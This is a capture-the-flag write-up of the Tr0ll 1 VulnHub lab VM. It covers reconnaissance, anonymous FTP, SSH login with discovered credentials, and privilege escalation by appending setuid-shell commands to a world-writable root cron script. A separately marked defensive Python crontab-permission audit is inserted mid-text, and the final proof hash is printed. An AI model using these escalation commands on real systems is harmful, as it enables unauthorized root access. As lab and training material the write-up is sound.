Tr0ll: 1

Running through CTFs is a great way to sharpen your offensive skills, so lately I’ve been spending a decent chunk of my spare time trying to pwn VulnHub VMs. I’m planning on doing a write-up for all the ones I’ve completed so far; this is the first in that series of posts. You can get this VM here

DESCRIPTION

Tr0ll was inspired by the constant trolling of the machines within the OSCP labs. The goal is simple, gain root and get Proof.txt from the /root directory. Not for the easily frustrated! Fair warning, there be trolls ahead!

MAPPING THE TARGET

The first step is to find the IP address belonging to the VM. We can do that using an ARP scanner called Netdiscover.

[email protected]:~$ sudo netdiscover
Currently scanning: 192.168.4.0/16   |   Screen View: Unique Hosts

7 Captured ARP Req/Rep packets, from 7 hosts.   Total size: 420
_____________________________________________________________________________
  IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
-----------------------------------------------------------------------------
192.168.1.25    00:0c:29:39:e9:62      1      60  VMware, Inc.

Now that we have an IP address, we can see which ports are open using nmap.

[email protected]:~$ sudo nmap -A -T4 -p- 192.168.1.25
Starting Nmap 7.40 ( https://nmap.org ) at 2017-01-18 01:43 EST
Nmap scan report for 192.168.1.25
Host is up (0.00048s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap [NSE: writeable]
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
|   2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
|_  256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/secret
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).

EXPLOITING

Ok, so we have anonymous FTP, SSH and Apache to play with. Let’s start from the top and see what FTP has to offer.

[email protected]:~$ ftp 192.168.1.25
Connected to 192.168.1.25.
220 (vsFTPd 3.0.2)
Name (192.168.1.25:mog): anonymous  
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        112          4096 Aug 09  2014 .
drwxr-xr-x    2 0        112          4096 Aug 09  2014 ..
-rwxrwxrwx    1 1000     0            8068 Aug 09  2014 lol.pcap
226 Directory send OK.
ftp> get lol.pcap
local: lol.pcap remote: lol.pcap
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for lol.pcap (8068 bytes).
226 Transfer complete.
8068 bytes received in 0.00 secs (2.7479 MB/s)
ftp> bye
221 Goodbye.

So I’ve just downloaded a packet capture file, but before opening it in Wireshark I decided to see if we could find anything interesting using strings.

[email protected]:~$ strings lol.pcap
RETR secret_stuff.txt
W150 Opening BINARY mode data connection for secret_stuff.txt (147 bytes).
WWell, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!

Hmm... we’ll file that away for later. Time to check what Apache has; loading up Firefox, we’re greeted with this image

[image: apache-default]

The trolling begins! The robots.txt for this site mentions a /secret directory, so let’s check that out.

User-agent:*
Disallow: /secret

[image: apache-secret]

Nothing useful here. I ran dirb to check for any other directories, but it came back empty.

[email protected]:~$ dirb http://192.168.1.25 /usr/share/dirb/wordlists/big.txt 
-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Wed Jan 18 02:30:51 2017
URL_BASE: http://192.168.1.25/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458                                                         

---- Scanning URL: http://192.168.1.25/ ----
+ http://192.168.1.25/robots.txt (CODE:200|SIZE:31)                                                                                    
==> DIRECTORY: http://192.168.1.25/secret/                                                                                             
+ http://192.168.1.25/server-status (CODE:403|SIZE:292)                                                                                
---- Entering directory: http://192.168.1.25/secret/ ----
        
-----------------
END_TIME: Wed Jan 18 02:31:04 2017
DOWNLOADED: 40916 - FOUND: 2

Nikto didn’t turn up anything interesting either.

[email protected]:~$ nikto -h http://192.168.1.25
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.25
+ Target Hostname:    192.168.1.25
+ Target Port:        80
+ Start Time:         2017-01-18 02:34:49 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x24 0x500438fe37ded 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/secret/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 1 entry which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7536 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2017-01-18 02:35:03 (GMT-5) (14 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

After a bit of thinking I realized that the sup3rs3cr3tdirlol mentioned in lol.pcap was likely a directory, and lo and behold

[image: sup3rs3cr3tdirlol]

Downloading and executing the binary found in that directory produces the following message

Find address 0x0856BF to proceed

I had a hunch this was going to be another directory rather than an actual memory address

[image: 0x0856BF]

Those directories contain the following

/0x0856BF/good_luck/which_one_lol.txt

maleus
ps-aux
felux
Eagle11
genphlux < -- Definitely not this one
usmc8892
blawrg
wytshadow
vis1t0r
overflow
Index of /0x0856BF/this_folder_contains_the_password/Pass.txt 
Good_job_:)

Using the list from which_one_lol.txt as potential usernames and Good_job_:) as the password, I ran this through Hydra against SSH. Unfortunately, after 8 wrong attempts the service closes for a few minutes (most likely thanks to fail2ban) and the session isn’t saved in Hydra, which makes brute-forcing a bit hard. After trying for a while to get Hydra to automatically resume after it times out, I figured doing this manually was probably much faster. It turns out that password isn’t valid for any of the accounts listed. But of course, this being one big exercise in trolling meant that I wasn’t taking it literally enough: the directory this_folder_contains_the_password was referencing the fact that the password actually was ‘Pass.txt’. After an hour or two I finally got on with the login overflow:Pass.txt

$ id
uid=1002(overflow) gid=1002(overflow) groups=1002(overflow)

After a few minutes of searching for files to help me gain root, I was booted off with the following message

Broadcast Message from [email protected]                                               
        (somewhere) at 0:10 ...                                                
                                                                               
TIMES UP LOL!                                                                  
                                                                               
Connection to 192.168.1.25 closed by remote host.

It seems the trolling isn’t over yet! I jumped back on and checked /var/log/cronlog to see if anything was being executed by crontab, and discovered that a script called cleaner.py was being run every 2 minutes

$ cat /var/log/cronlog
*/2 * * * * cleaner.py

Using find I discovered it was sitting in /lib/log/ and was world-writable. These are the contents of the script

$ cat /lib/log/cleaner.py
#!/usr/bin/env python
import os
import sys
try:
	os.system('rm -r /tmp/* ')
except:
	sys.exit()

I appended the following and made a coffee

os.system('cp /bin/sh /tmp/shell')
os.system('chmod 4777 /tmp/shell')
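The root cause here is a script that root's crontab runs but that any user can edit. As an added defensive example (not part of this write-up), the audit below parses crontab lines like the one above, locates each command and flags scripts an unprivileged user could alter or replace; the temp-directory layout, the assumption that bare command names are resolved against a list of search directories standing in for cron's PATH, and the sample cron line are all constructed.

```python
import os
import re
import stat
import tempfile
CRON_RE = re.compile(r"^\s*(?:\S+\s+){5}(.+?)\s*$")  # five schedule fields, then the command

def cron_command(line):
    """Return the command part of a crontab line, or None for blanks/comments."""
    if not line.strip() or line.lstrip().startswith("#"):
        return None
    m = CRON_RE.match(line)
    return m.group(1) if m else None

def resolve(command, search_dirs):
    """Locate the executable; a bare name is looked up in search_dirs (cron's PATH)."""
    exe = command.split()[0]
    paths = [exe] if os.path.isabs(exe) else [os.path.join(d, exe) for d in search_dirs]
    return next((p for p in paths if os.path.isfile(p)), None)

def weak_permissions(path):
    """Ways an unprivileged user could alter or replace a script root's crontab runs."""
    st, findings = os.stat(path), []
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    if st.st_uid != 0:
        findings.append("not owned by root")
    parent = os.stat(os.path.dirname(path))
    if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
        findings.append("parent directory world-writable without sticky bit")
    return findings

def audit_crontab(lines, search_dirs):
    """Map each cron command to its findings; unresolvable commands are flagged too."""
    report = {}
    for cmd in filter(None, map(cron_command, lines)):
        path = resolve(cmd, search_dirs)
        if path is None:
            report[cmd] = ["command not found in search dirs"]
        elif weak_permissions(path):
            report[path] = weak_permissions(path)
    return report

def demo():
    """Constructed Tr0ll-style layout in a temp dir: root cron entry, 0777 cleaner.py."""
    lib_log = tempfile.mkdtemp()
    script = os.path.join(lib_log, "cleaner.py")
    with open(script, "w") as f:
        f.write("#!/usr/bin/env python\nimport os\nos.system('rm -r /tmp/* ')\n")
    os.chmod(script, 0o777)  # the misconfiguration from the write-up
    return audit_crontab(["*/2 * * * * cleaner.py", "# comment"], [lib_log])
```

On a real host you would feed it /etc/crontab, /etc/cron.d/* and root's crontab with cron's actual PATH; a non-empty report is the condition that let this box fall.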

When I came back I had a setuid shell owned by root that I could use

$ ls -lah /tmp
total 120K
drwxrwxrwt  2 root root 4.0K Jan 18 00:30 .
drwxr-xr-x 21 root root 4.0K Aug  9  2014 ..
-rwsrwxrwx  1 root root 110K Jan 18 00:30 shell
$ ./tmp/shell
# id
uid=1002(overflow) gid=1002(overflow) euid=0(root) groups=0(root),1002(overflow)
# cd /root
# ls -lah
total 28K
drwx------  3 root root 4.0K Aug 13  2014 .
drwxr-xr-x 21 root root 4.0K Aug  9  2014 ..
-rw-------  1 root root    0 Aug 13  2014 .bash_history
-rw-r--r--  1 root root   58 Aug 10  2014 proof.txt
-rw-r--r--  1 root root   74 Aug 10  2014 .selected_editor
drwx------  2 root root 4.0K Aug 10  2014 .ssh
-rw-------  1 root root 5.5K Aug 13  2014 .viminfo

SUCCESS!

# cat proof.txt
Good job, you did it! 

702a8c18d29c6f3ca0d99ef5712bfbdc